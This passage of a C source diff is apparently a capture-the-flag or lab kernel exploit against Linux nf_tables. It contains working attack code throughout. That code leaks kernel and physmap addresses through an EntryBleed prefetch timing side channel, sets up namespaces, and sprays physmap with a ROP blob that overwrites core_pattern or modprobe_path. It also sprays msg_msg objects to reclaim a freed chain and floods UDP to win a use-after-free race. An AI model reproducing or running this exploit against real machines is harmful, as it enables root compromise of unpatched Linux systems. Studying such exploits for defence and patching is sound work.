PREFETCH_THRESHOLD_XEON 130 +#define PREFETCH_THRESHOLD_MARGIN 24 +#define KTEXT_SCAN_START 0xffffffff81000000ULL +#define KTEXT_SCAN_END 0xffffffffc1000000ULL +#define KTEXT_SCAN_STEP 0x200000ULL +#define KTEXT_INTEL_STEP 0x1000000ULL +#define DIRECT_MAP_START 0xffff888000000000ULL +#define DIRECT_MAP_END 0xffffc88000000000ULL +#define DIRECT_MAP_COARSE_STEP 0x80000000ULL +#define DIRECT_MAP_CAND_STEP 0x10000000ULL +#define DIRECT_MAP_REFINE_STEP 0x10000000ULL +#define INTEL_PREFETCH_SAMPLES 16 +#define INTEL_PREFETCH_VOTES 7 +#define INTEL_DIRECT_COARSE_STEP 0x40000000ULL +#define INTEL_DIRECT_REFINE_STEP 0x4000000ULL + +static size_t prefetch_hist[PREFETCH_HIST_SIZE]; +static int prefetch_threshold; +static int prefetch_cpu_vendor = -1; + +static inline __attribute__((always_inline)) uint64_t rdtsc_begin(void) +{ + uint64_t a, d; + asm volatile("mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "xor %%rax, %%rax\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline __attribute__((always_inline)) uint64_t rdtsc_end(void) +{ + uint64_t a, d; + asm volatile("xor %%rax, %%rax\n\t" + "mfence\n\t" + "rdtscp\n\t" + "mov %%rdx, %0\n\t" + "mov %%rax, %1\n\t" + "mfence\n\t" + : "=r"(d), "=r"(a) + : + : "%rax", "%rbx", "%rcx", "%rdx"); + return (d << 32) | a; +} + +static inline void prefetch_probe(const void *p) +{ + asm volatile("prefetchnta (%0)" : : "r"(p)); + asm volatile("prefetcht2 (%0)" : : "r"(p)); +} + +static size_t prefetch_once(uint64_t addr) +{ + size_t t = rdtsc_begin(); + prefetch_probe((const void *)addr); + return rdtsc_end() - t; +} + +static size_t prefetch_measure_tries(uint64_t addr, int tries) +{ + memset(prefetch_hist, 0, sizeof(prefetch_hist)); + for (int i = 0; i < tries; i++) { + size_t d = prefetch_once(addr); + if (d >= PREFETCH_HIST_SIZE) + d = PREFETCH_HIST_SIZE - 1; + prefetch_hist[d]++; + } + + size_t sum = 0; + for (int i = 0; i < PREFETCH_HIST_SIZE; i++) + sum += prefetch_hist[i] * i; + return sum / tries; +} + +static size_t prefetch_measure(uint64_t addr) +{ + return prefetch_measure_tries(addr, PREFETCH_CONFIRM_TRIES); +} + +static int prefetch_cpu_is_intel(void) +{ + if (prefetch_cpu_vendor >= 0) + return prefetch_cpu_vendor == 1; + + prefetch_cpu_vendor = 0; + FILE *f = fopen("/proc/cpuinfo", "r"); + if (!f) + return 0; + + char line[512]; + while (fgets(line, sizeof(line), f)) { + if (strstr(line, "GenuineIntel") || strstr(line, "Intel(R)")) { + prefetch_cpu_vendor = 1; + break; + } + } + fclose(f); + return prefetch_cpu_vendor == 1; +} + +static void detect_prefetch_threshold(void) +{ + char buf[512] = {0}; + int fd = open("/proc/cpuinfo", O_RDONLY | O_CLOEXEC); + + prefetch_threshold = PREFETCH_THRESHOLD_DEFAULT; + if (fd >= 0) { + ssize_t n = read(fd, buf, sizeof(buf) - 1); + close(fd); + if (n > 0 && strstr(buf, "Xeon")) + prefetch_threshold = PREFETCH_THRESHOLD_XEON; + } +} + +static void pin_prefetch_cpu(cpu_set_t *oldset, int *have_old) +{ + cpu_set_t set; + + *have_old = sched_getaffinity(0, sizeof(*oldset), oldset) == 0; + CPU_ZERO(&set); + CPU_SET(0, &set); + if (sched_setaffinity(0, sizeof(set), &set) < 0) + perror("sched_setaffinity(prefetch)"); +} + +static void restore_prefetch_cpu(cpu_set_t *oldset, int have_old) +{ + if (have_old && sched_setaffinity(0, sizeof(*oldset), oldset) < 0) + perror("sched_setaffinity(restore)"); +} + +static size_t prefetch_measure_min(uint64_t addr, int samples, + int prime_syscall) +{ + size_t best = (size_t)-1; + + for (int i = 0; i < samples; i++) { + if (prime_syscall) + (void)syscall(SYS_getuid); + size_t t = prefetch_once(addr); + if (t < best) + best = t; + } + return best; +} + +static uint64_t prefetch_scan_lowest_vote(const char *name, uint64_t start, + uint64_t end, uint64_t step, + uint64_t probe_add, + int prime_syscall) +{ + cpu_set_t oldset; + int have_old = 0; + uint64_t votes[INTEL_PREFETCH_VOTES] = {0}; + + pin_prefetch_cpu(&oldset, &have_old); + printf("[*] prefetch %s: intel-min step=%#lx probe_add=%#lx\n", + name, (unsigned long)step, (unsigned long)probe_add); + + for (int vote = 0; vote < INTEL_PREFETCH_VOTES; vote++) { + uint64_t best_addr = 0; + size_t best = (size_t)-1; + size_t second = (size_t)-1; + unsigned long best_idx = 0; + unsigned long idx = 0; + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_min(addr + probe_add, + INTEL_PREFETCH_SAMPLES, + prime_syscall); + if (t < best) { + second = best; + best = t; + best_addr = addr; + best_idx = idx; + } else if (t < second) { + second = t; + } + } + + if (second != (size_t)-1 && best == second) { + printf("[*] prefetch %s: intel vote %d flat best=%#lx t=%zu\n", + name, vote, (unsigned long)best_addr, best); + votes[vote] = 0; + continue; + } + + votes[vote] = best_addr; + printf("[*] prefetch %s: intel vote %d best=%#lx i=%lu t=%zu second=%zu\n", + name, vote, (unsigned long)best_addr, best_idx, + best, second); + } + + restore_prefetch_cpu(&oldset, have_old); + + uint64_t candidate = 0; + int balance = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) { + if (!votes[i]) + continue; + if (balance == 0) { + candidate = votes[i]; + balance = 1; + } else if (candidate == votes[i]) { + balance++; + } else { + balance--; + } + } + + int count = 0; + for (int i = 0; i < INTEL_PREFETCH_VOTES; i++) + if (votes[i] == candidate) + count++; + + if (candidate && count > INTEL_PREFETCH_VOTES / 2) { + printf("[+] prefetch %s: intel found=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, + INTEL_PREFETCH_VOTES); + return candidate; + } + + printf("[!] prefetch %s: intel majority failed candidate=%#lx votes=%d/%d\n", + name, (unsigned long)candidate, count, INTEL_PREFETCH_VOTES); + return 0; +} + +static uint64_t prefetch_scan_first_hit(const char *name, uint64_t start, + uint64_t end, uint64_t step) +{ + cpu_set_t oldset; + int have_old = 0; + unsigned long idx = 0; + uint64_t found = 0; + + if (!prefetch_threshold) + detect_prefetch_threshold(); + + pin_prefetch_cpu(&oldset, &have_old); + (void)prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t bad = prefetch_measure_tries(0xffffffff00000000ULL, + PREFETCH_SCAN_TRIES); + size_t threshold = prefetch_threshold; + if (bad + PREFETCH_THRESHOLD_MARGIN < threshold) + threshold = bad + PREFETCH_THRESHOLD_MARGIN; + printf("[*] prefetch %s: bad=%zu threshold=%zu step=%#lx\n", + name, bad, threshold, (unsigned long)step); + + for (uint64_t addr = start; addr < end; addr += step, idx++) { + size_t t = prefetch_measure_tries(addr, PREFETCH_SCAN_TRIES); + if ((idx & 0x3ff) == 0) + printf("[*] prefetch %s: addr=%#lx i=%lu t=%zu\n", + name, (unsigned long)addr, idx, t); + if (t > threshold) { + size_t confirm = prefetch_measure(addr); + if (confirm > threshold) { + found = addr; + printf("[+] prefetch %s: found=%#lx i=%lu t=%zu/%zu\n", + name, (unsigned long)addr, idx, t, confirm); + break; + } + printf("[*] prefetch %s: transient=%#lx t=%zu/%zu\n", + name, (unsigned long)addr, t, confirm); + } + } + + restore_prefetch_cpu(&oldset, have_old); + if (!found) + printf("[!] prefetch %s: no hit\n", name); + return found; +} + +static void add_u64_candidate(uint64_t *arr, int *n, int max, uint64_t val) +{ + if (!val) + return; + for (int i = 0; i < *n; i++) + if (arr[i] == val) + return; + if (*n < max) + arr[(*n)++] = val; +} + +static uint64_t leak_kernel_text_prefetch(void) +{ + if (prefetch_cpu_is_intel()) { + return prefetch_scan_lowest_vote("kernel-entry", + KTEXT_SCAN_START, + KTEXT_SCAN_END, + KTEXT_INTEL_STEP, + OFF_ENTRY_SYSCALL_64, 1); + } + return prefetch_scan_first_hit("kernel-text", KTEXT_SCAN_START, + KTEXT_SCAN_END, KTEXT_SCAN_STEP); +} + +static uint64_t leak_direct_mapping_prefetch(void) +{ + uint64_t coarse, ref_start, ref_end, refined; + + if (prefetch_cpu_is_intel()) { + coarse = prefetch_scan_lowest_vote("direct-map", + DIRECT_MAP_START, + DIRECT_MAP_END, + INTEL_DIRECT_COARSE_STEP, + 0, 0); + if (!coarse) + return 0; + + ref_start = coarse > 2 * INTEL_DIRECT_COARSE_STEP ? + coarse - 2 * INTEL_DIRECT_COARSE_STEP : + DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + INTEL_DIRECT_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_lowest_vote("direct-map-refine", + ref_start, ref_end, + INTEL_DIRECT_REFINE_STEP, + 0, 0); + return refined ? refined : coarse; + } + + coarse = prefetch_scan_first_hit("direct-map", DIRECT_MAP_START, + DIRECT_MAP_END, DIRECT_MAP_COARSE_STEP); + if (!coarse) + return 0; + + ref_start = coarse > 3 * DIRECT_MAP_COARSE_STEP ? + coarse - 3 * DIRECT_MAP_COARSE_STEP : DIRECT_MAP_START; + if (ref_start < DIRECT_MAP_START) + ref_start = DIRECT_MAP_START; + ref_end = coarse + DIRECT_MAP_COARSE_STEP; + if (ref_end > DIRECT_MAP_END || ref_end < coarse) + ref_end = DIRECT_MAP_END; + + refined = prefetch_scan_first_hit("direct-map-refine", ref_start, + ref_end, DIRECT_MAP_REFINE_STEP); + return refined ? refined : coarse; +} +static uint64_t kbase_cands[MAX_KBASE_CANDS]; +static int n_kbase_cands = 0; +static uint64_t phbase_cands[MAX_PHBASE_CANDS]; +static int n_phbase_cands = 0; + +static int do_entrybleed(void) { + printf("[*] Entrybleed: scanning kbase with prefetch side channel...\n"); + kbase = leak_kernel_text_prefetch(); + + /* Sanity: kbase must be in the valid range */ + if (kbase < 0xffffffff81000000ULL || + kbase >= 0xffffffffc1000000ULL) { + printf("[-] Entrybleed: kbase %#lx out of range\n", + (unsigned long)kbase); + kbase = 0; + return 0; + } + + n_kbase_cands = 0; + add_u64_candidate(kbase_cands, &n_kbase_cands, MAX_KBASE_CANDS, kbase); + for (int d = -16; d <= 16 && n_kbase_cands < MAX_KBASE_CANDS; d++) { + if (d == 0) continue; + uint64_t c = kbase + d * KTEXT_SCAN_STEP; + if (c < 0xffffffff81000000ULL || + c >= 0xffffffffc1000000ULL) continue; + add_u64_candidate(kbase_cands, &n_kbase_cands, + MAX_KBASE_CANDS, c); + } + printf("[+] kbase=%#lx (%d candidates)\n", + (unsigned long)kbase, n_kbase_cands); + + /* Skip phbase scan if using userblob (no SMAP -> don't need physmap) */ + if (use_userblob) { + phbase = 0xffff888000000000ULL; /* dummy, unused */ + printf("[*] Entrybleed: skipping physmap scan (userblob mode)\n"); + return 1; + } + + printf("[*] Entrybleed: scanning direct-map base with prefetch side channel...\n"); + phbase = leak_direct_mapping_prefetch(); + + /* Sanity: phbase must be in valid range */ + if (phbase < DIRECT_MAP_START || phbase >= DIRECT_MAP_END) { + printf("[-] Entrybleed: phbase %#lx out of range\n", + (unsigned long)phbase); + phbase = 0; + return 0; + } + + n_phbase_cands = 0; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, phbase); + int spiral[] = {-1, 1, -2, 2, -3, 3, -4, 4, -5, 5, -6, 6}; + for (size_t s = 0; s < sizeof(spiral) / sizeof(spiral[0]) && + n_phbase_cands < MAX_PHBASE_CANDS; s++) { + uint64_t c = phbase + spiral[s] * DIRECT_MAP_CAND_STEP; + if (c < DIRECT_MAP_START || c >= DIRECT_MAP_END) continue; + add_u64_candidate(phbase_cands, &n_phbase_cands, + MAX_PHBASE_CANDS, c); + } + printf("[+] phbase=%#lx (%d candidates)\n", + (unsigned long)phbase, n_phbase_cands); + return 1; +} + +/* ================================================================ + * Namespace setup + * ================================================================ */ +static void xwrite(const char *path, const char *s) { + int fd = open(path, O_WRONLY | O_CLOEXEC); + if (fd < 0) die(path); + if (write(fd, s, strlen(s)) < 0) { /* ignore */ } + close(fd); +} +static void setup_ns(void) { + uid_t u = getuid(); gid_t g = getgid(); + if (u == 0) { + if (setresgid(DROP_GID,DROP_GID,DROP_GID) < 0) + die("setresgid(drop)"); + if (setresuid(DROP_UID,DROP_UID,DROP_UID) < 0) + die("setresuid(drop)"); + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + u = getuid(); g = getgid(); + } + if (unshare(CLONE_NEWUSER) < 0) die("unshare(NEWUSER)"); + xwrite("/proc/self/setgroups", "deny\n"); + char m[64]; + snprintf(m, sizeof(m), "0 %u 1\n", u); + xwrite("/proc/self/uid_map", m); + snprintf(m, sizeof(m), "0 %u 1\n", g); + xwrite("/proc/self/gid_map", m); + if (setresgid(0,0,0) < 0) die("setresgid(root)"); + if (setresuid(0,0,0) < 0) die("setresuid(root)"); + if (unshare(CLONE_NEWNET) < 0) die("unshare(NEWNET)"); + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd >= 0) { + struct ifreq ifr = {0}; + strncpy(ifr.ifr_name, "lo", IFNAMSIZ-1); + ioctl(fd, SIOCGIFFLAGS, &ifr); + ifr.ifr_flags |= IFF_UP | IFF_RUNNING; + ioctl(fd, SIOCSIFFLAGS, &ifr); + close(fd); + } +} + +/* ================================================================ + * Netlink helpers (simple single-op for this exploit) + * ================================================================ */ +static int nl_sock = -1; +static uint32_t nl_seq; + +static void *nlmsg_tail(struct nlmsghdr *h) { + return (char *)h + NLMSG_ALIGN(h->nlmsg_len); +} +static int nla_put(struct nlmsghdr *h, size_t mx, uint16_t t, + const void *d, size_t l) { + size_t nw = NLMSG_ALIGN(h->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN + l); + if (nw > mx) return -1; + struct nlattr *a = nlmsg_tail(h); + a->nla_type = t; a->nla_len = NLA_HDRLEN + l; + if (l) memcpy((char*)a + NLA_HDRLEN, d, l); + h->nlmsg_len = nw; + return 0; +} +static int nlastr(struct nlmsghdr *h, size_t mx, uint16_t t, const char *s) { + return nla_put(h, mx, t, s, strlen(s)+1); +} +static int nla32(struct nlmsghdr *h, size_t mx, uint16_t t, uint32_t v) { + v = htonl(v); + return nla_put(h, mx, t, &v, 4); +} +static struct nlattr *nla_nest_s(struct nlmsghdr *h, size_t mx, uint16_t t) { + size_t nw = NLMSG_ALIGN(h->nlmsg_len) + NLA_ALIGN(NLA_HDRLEN); + if (nw > mx) return NULL; + struct nlattr *a = nlmsg_tail(h); + a->nla_type = t | NLA_F_NESTED; + a->nla_len = NLA_HDRLEN; + h->nlmsg_len = nw; + return a; +} +static void nla_nest_e(struct nlmsghdr *h, struct nlattr *a) { + a->nla_len = (char *)nlmsg_tail(h) - (char *)a; +} + +static int nl_open(void) { + nl_sock = socket(AF_NETLINK, SOCK_RAW|SOCK_CLOEXEC, NETLINK_NETFILTER); + if (nl_sock < 0) return -1; + struct sockaddr_nl sa = { .nl_family = AF_NETLINK, + .nl_pid = getpid() }; + if (bind(nl_sock, (struct sockaddr*)&sa, sizeof(sa)) < 0) return -1; + int bufsz = 1 << 20; + setsockopt(nl_sock, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz)); + setsockopt(nl_sock, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz)); + return 0; +} + +static size_t batch_hdr(char *buf, size_t mx, uint16_t type, uint16_t res) { + (void)mx; + struct nlmsghdr *h = (void *)buf; + memset(h, 0, sizeof(*h)); + h->nlmsg_type = type; + h->nlmsg_flags = NLM_F_REQUEST; + h->nlmsg_seq = ++nl_seq; + h->nlmsg_pid = getpid(); + h->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(h); + g->nfgen_family = 0; g->version = NFNETLINK_V0; + g->res_id = htons(res); + return NLMSG_ALIGN(h->nlmsg_len); +} + +static int recv_ack(uint32_t seq) { + char buf[8192]; struct timeval tv = {5, 0}; + setsockopt(nl_sock, SOL_SOCKET, SO_RCVTIMEO, &tv, sizeof(tv)); + for (;;) { + ssize_t n = recv(nl_sock, buf, sizeof(buf), 0); + if (n <= 0) return -errno; + for (struct nlmsghdr *h = (void*)buf; + NLMSG_OK(h, (unsigned)n); h = NLMSG_NEXT(h, n)) { + if (h->nlmsg_type != NLMSG_ERROR) continue; + struct nlmsgerr *e = NLMSG_DATA(h); + if (h->nlmsg_seq == seq) return e->error; + } + } +} + +#define NFT_T(msg) ((NFNL_SUBSYS_NFTABLES << 8) | (msg)) +#define NLC (NLM_F_CREATE | NLM_F_EXCL) + +static int nft_newtable(uint8_t fam, const char *name) { + char buf[4096]; size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (void*)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWTABLE); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t s = ++nl_seq; op->nlmsg_seq = s; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = fam; g->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_TABLE_NAME, name); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(s); +} + +static int nft_newchain(uint8_t fam, const char *tab, const char *chain, + uint32_t hooknum, int32_t prio) { + char buf[4096]; size_t off = 0; + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_BEGIN, NFNL_SUBSYS_NFTABLES); + struct nlmsghdr *op = (void*)(buf+off); + memset(op, 0, sizeof(*op)); + op->nlmsg_type = NFT_T(NFT_MSG_NEWCHAIN); + op->nlmsg_flags = NLM_F_REQUEST|NLM_F_ACK|NLC; + uint32_t s = ++nl_seq; op->nlmsg_seq = s; + op->nlmsg_pid = getpid(); + op->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); + struct nfgenmsg *g = NLMSG_DATA(op); + g->nfgen_family = fam; g->version = NFNETLINK_V0; + nlastr(op, sizeof(buf), NFTA_CHAIN_TABLE, tab); + nlastr(op, sizeof(buf), NFTA_CHAIN_NAME, chain); + struct nlattr *hk = nla_nest_s(op, sizeof(buf), NFTA_CHAIN_HOOK); + nla32(op, sizeof(buf), NFTA_HOOK_HOOKNUM, hooknum); + nla32(op, sizeof(buf), NFTA_HOOK_PRIORITY, (uint32_t)prio); + nla_nest_e(op, hk); + nla32(op, sizeof(buf), NFTA_CHAIN_POLICY, NF_ACCEPT); + off += NLMSG_ALIGN(op->nlmsg_len); + off += batch_hdr(buf+off, sizeof(buf)-off, + NFNL_MSG_BATCH_END, NFNL_SUBSYS_NFTABLES); + struct sockaddr_nl sa = { .nl_family = AF_NETLINK }; + sendto(nl_sock, buf, off, 0, (struct sockaddr*)&sa, sizeof(sa)); + return recv_ack(s); +} + +/* ================================================================ + * IPv6 hook saturation + * ================================================================ */ +static int saturate_ipv6_hooks(void) { + printf("[*] creating ipv6 table t6\n"); + int err = nft_newtable(NFPROTO_IPV6, "t6"); + if (err && err != -EEXIST) { + printf("[-] newtable ipv6: %d\n", err); + return -1; + } + printf("[*] saturating ipv6 LOCAL_OUT...\n"); + int i; + for (i = 0; i < IPV6_SATURATE_MAX; i++) { + char name[32]; + snprintf(name, sizeof(name), "c%d", i); + err = nft_newchain(NFPROTO_IPV6, "t6", name, + NF_INET_LOCAL_OUT, 0); + if (err == -E2BIG) { + printf("[+] ipv6 LOCAL_OUT saturated at %d chains\n",i); + break; + } + if (err) { + printf("[-] ipv6 chain %d: %d\n", i, err); + return -1; + } + if (i % 128 == 0) printf(" ... %d\n", i); + } + if (i >= IPV6_SATURATE_MAX) { + printf("[-] failed to saturate (reached max)\n"); + return -1; + } + /* Create INET table for the race */ + printf("[*] creating inet table ti\n"); + err = nft_newtable(NFPROTO_INET, "ti"); + if (err && err != -EEXIST) { + printf("[-] newtable inet: %d\n", err); + return -1; + } + + /* No padding hooks -- they delayed packets past WRITE_ONCE(accept_all), + * guaranteeing packets never called nft_do_chain_inet. */ + + return 0; +} + +/* ================================================================ + * Physmap spray + ROP blob + * ================================================================ */ +static void physmap_spray(void) { + size_t sz = (size_t)physmap_mb << 20; + phys_region = mmap(NULL, sz, PROT_READ|PROT_WRITE, + MAP_SHARED|MAP_ANONYMOUS|MAP_POPULATE, -1, 0); + if (phys_region == MAP_FAILED) die("mmap physmap"); + printf("[+] physmap: %d MB at %p\n", physmap_mb, phys_region); +} + +static uint64_t read_physmap_kva(void) { + int fd = open("/proc/self/pagemap", O_RDONLY); + if (fd < 0) return 0; + uint64_t vaddr = (uint64_t)phys_region; + uint64_t entry = 0; + if (pread(fd, &entry, 8, (off_t)(vaddr/4096)*8) != 8) { + close(fd); return 0; + } + close(fd); + if (!(entry & (1ULL<<63))) return 0; + uint64_t pfn = entry & ((1ULL<<55)-1); + if (!pfn) return 0; + return phbase + pfn * 4096; +} + +/* + * Build a self-contained ROP blob for a page at the given KVA. + * The page_kva is used for src_va (the path string address within that page). + * This means each blob is independent: if the msg_msg blob_gen_X points to + * ANY physmap page, the src_va in that page's blob correctly references + * that same page's PATH_OFFSET. + */ +static void build_blob(uint8_t *blob, uint64_t page_kva) { + /* Target: overwrite core_pattern (avoids /proc mount dependency). + * Fallback: overwrite modprobe_path if use_core_pattern is off. */ + uint64_t target_va = use_core_pattern ? + (kbase + OFF_CORE_PATTERN) : (kbase + OFF_MODPROBE); + uint64_t nft_imm_ops = kbase + OFF_NFT_IMM_OPS; + uint64_t pop_rsi_rdi = kbase + OFF_POP_RSI_POP_RDI_JMP_RETURN_THUNK; + uint64_t pop_rdi = kbase + OFF_POP_RDI_JMP_RETURN_THUNK; + uint64_t strcpy_va = kbase + OFF_STRCPY; + uint64_t msleep_va = kbase + OFF_MSLEEP; + uint64_t ret_thunk = kbase + OFF_RETURN_THUNK; + uint64_t src_va = page_kva + PATH_OFFSET; + + memset(blob, 0, 0x98); + + /* blob_gen->size: rdp0(8) + 4*expr(128) + rdp1(8) = 144 = 0x90 */ + uint64_t blob_size = 0x90; + memcpy(blob + 0x000, &blob_size, 8); + + /* Rule descriptor: dlen = 4 expressions * 0x20 = 128, is_last = 0 */ + uint64_t rdp0 = (128ULL << 1) | 0; + memcpy(blob + 0x008, &rdp0, 8); + + /* Expr 0: pop rsi=src_va, pop rdi=target_va -> DREG_RET (ret addr) */ + memcpy(blob + 0x010, &nft_imm_ops, 8); + uint64_t *d1 = (uint64_t*)(blob + 0x018); + d1[0] = pop_rsi_rdi; d1[1] = src_va; + blob[0x028] = DREG_RET; blob[0x029] = 16; + + /* Expr 1: strcpy(target, src_va) -> DREG_RET4 (ret+16) */ + memcpy(blob + 0x030, &nft_imm_ops, 8); + uint64_t *d2 = (uint64_t*)(blob + 0x038); + d2[0] = target_va; d2[1] = strcpy_va; + blob[0x048] = DREG_RET4; blob[0x049] = 16; + + /* Expr 2: pop rdi=0x7FFFFFFF (~25 days) -> DREG_RET8 (ret+32) */ + memcpy(blob + 0x050, &nft_imm_ops, 8); + uint64_t *d3 = (uint64_t*)(blob + 0x058); + d3[0] = pop_rdi; d3[1] = 0x7FFFFFFFULL; + blob[0x068] = DREG_RET8; blob[0x069] = 16; + + /* Expr 3: msleep(0x7FFFFFFF) -> DREG_RET12 (ret+48) + * msleep blocks effectively forever, keeping the process alive + * so the parent can poll and capture the flag. + * do_exit was killing the process + closing memfd FDs. */ + memcpy(blob + 0x070, &nft_imm_ops, 8); + uint64_t *d4 = (uint64_t*)(blob + 0x078); + d4[0] = msleep_va; d4[1] = ret_thunk; + blob[0x088] = DREG_RET12; blob[0x089] = 16; + + uint64_t rdp1 = 1; + memcpy(blob + 0x090, &rdp1, 8); +} + +/* + * Fill every physmap page with a self-contained ROP blob. + * Each page's blob references its OWN KVA for the path string. + * We don't know exact per-page KVAs without pagemap, but the blob + * is parameterized by g_page_kva (the KVA we THINK the page is at). + * Since all pages have the same physical layout and the src_va + * offset is relative to the same page, ANY page whose KVA matches + * the blob_gen_X pointer in the msg_msg will work. + */ +static void physmap_fill_rop(void) { + /* When g_page_kva is known (pagemap), all pages use the same blob + * referencing g_page_kva. When unknown, we still stamp all pages + * with the same blob -- the msg_msg spray will try different KVAs + * and each will reference that KVA's page. */ + uint8_t blob[256]; + build_blob(blob, g_page_kva); + + /* Choose which string to place at PATH_OFFSET */ + const char *payload_str = use_core_pattern ? + g_core_cmd : g_modprobe_path; + size_t path_len = strlen(payload_str) + 1; + size_t sz = (size_t)physmap_mb << 20; + for (size_t o = 0; o < sz; o += 4096) { + uint8_t *pg = (uint8_t*)phys_region + o; + memset(pg, 0, PATH_OFFSET + 64); + memcpy(pg, blob, 0x98); + memcpy(pg + PATH_OFFSET, payload_str, path_len); + } + printf("[+] physmap filled with ROP blob + %s (%s)\n", + use_core_pattern ? "core_pattern" : "modprobe_path", + payload_str); +} + +/* ================================================================ + * msg_msg spray (kmalloc-256 reclaim for nft_base_chain) + * ================================================================ */ +static int spray_qids[NUM_SPRAY_QS]; + +static void build_spray_msg(char *msgbuf, uint64_t page_kva) { + /* msgbuf: [long mtype][char mtext[MTEXT_SZ]] */ + long mtype = 1; + memcpy(msgbuf, &mtype, sizeof(long)); + char *mtext = msgbuf + sizeof(long); + memset(mtext, 0, MTEXT_SZ); + + /* blob_gen_0 at alloc offset 80 -> mtext[32] */ + memcpy(mtext + (ALLOC_BLOB_GEN0 - MSG_HDR_SZ), &page_kva, 8); + /* blob_gen_1 at alloc offset 88 -> mtext[40] */ + memcpy(mtext + (ALLOC_BLOB_GEN1 - MSG_HDR_SZ), &page_kva, 8); + /* policy (NF_ACCEPT=1) at alloc offset 64 -> mtext[16] */ + mtext[ALLOC_POLICY - MSG_HDR_SZ] = 1; + /* flags (NFT_CHAIN_BASE bit 0) at alloc offset 164 -> mtext[116] */ + mtext[ALLOC_FLAGS - MSG_HDR_SZ] = 0x01; +} + +static void spray_msgs(uint64_t page_kva) { + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *msgbuf = calloc(1, bufsz); + build_spray_msg(msgbuf, page_kva); + + int total = 0; + for (int i = 0; i < NUM_SPRAY_QS; i++) { + spray_qids[i] = msgget(IPC_PRIVATE, IPC_CREAT|0600); + if (spray_qids[i] < 0) die("msgget spray"); + for (int j = 0; j < MSGS_PER_Q; j++) { + long mt = j + 1; + memcpy(msgbuf, &mt, sizeof(long)); + if (msgsnd(spray_qids[i], msgbuf, MTEXT_SZ, + IPC_NOWAIT) < 0) { + if (errno == EAGAIN) break; + die("msgsnd spray"); + } + total++; + } + } + free(msgbuf); + printf("[+] sprayed %d msg_msg into kmalloc-256\n", total); +} + +static void free_spray(void) { + size_t bufsz = sizeof(long) + MTEXT_SZ; + char *tmp = malloc(bufsz); + for (int i = 0; i < NUM_SPRAY_QS; i++) { + for (int j = 0; j < MSGS_PER_Q; j++) + msgrcv(spray_qids[i], tmp, MTEXT_SZ, 0, IPC_NOWAIT); + msgctl(spray_qids[i], IPC_RMID, NULL); + } + free(tmp); +} + +/* ================================================================ + * UDP flood thread (CPU 1) + * + * Sends packets via sendmmsg to trigger nft_do_chain on the IPv4 + * LOCAL_OUT hook. Yields every 8th batch to report RCU quiescent + * states, ensuring synchronize_rcu() on CPU 0 completes in ~1ms + * instead of blocking for 10s+ (PREEMPT_NONE kernel). + * ================================================================ */ +static void *udp_flood_thread(void *unused) { + (void)unused; + cpu_pin(1); + + int s = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (s < 0) die("socket udp"); + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(12345), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK) + }; + + #define FLOOD_BATCH 128 + char pkt[64]; + memset(pkt, 0x41, sizeof(pkt)); + + struct iovec iov[FLOOD_BATCH]; + struct mmsghdr msgs[FLOOD_BATCH]; + memset(msgs, 0, sizeof(msgs)); + for (int i = 0; i < FLOOD_BATCH; i++) { + iov[i].iov_base = pkt; + iov[i].iov_len = sizeof(pkt); + msgs[i].msg_hdr.msg_name = &dst; + msgs[i].msg_hdr.msg_namelen = sizeof(dst); + msgs[i].msg_hdr.msg_iov = &iov[i]; + msgs[i].msg_hdr.msg_iovlen = 1; + } + + unsigned long batch_count = 0; + while (race_running && !race_won) { + sendmmsg(s, msgs, FLOOD_BATCH, 0); + batch_count++; + /* + * Yield every 8th batch (~every 800us at ~128 pkts/batch). + * Context switch -> rcu_note_context_switch() -> quiescent + * state for CPU 1, allowing synchronize_rcu() on CPU 0 + * to complete. Without this, PREEMPT_NONE means CPU 1 + * can hold off RCU grace periods for 10s+. + */ + if (batch_count % FLOOD_YIELD_INTERVAL == 0) + sched_yield(); + } + close(s); + return NULL; +} + +/* ================================================================ + * Dedicated spray thread (CPU 0) -- reclaims freed chain slot + * + * Runs on the same CPU as the race thread. When the race thread + * blocks in synchronize_rcu() (called unconditionally in + * __nf_tables_abort after each failed 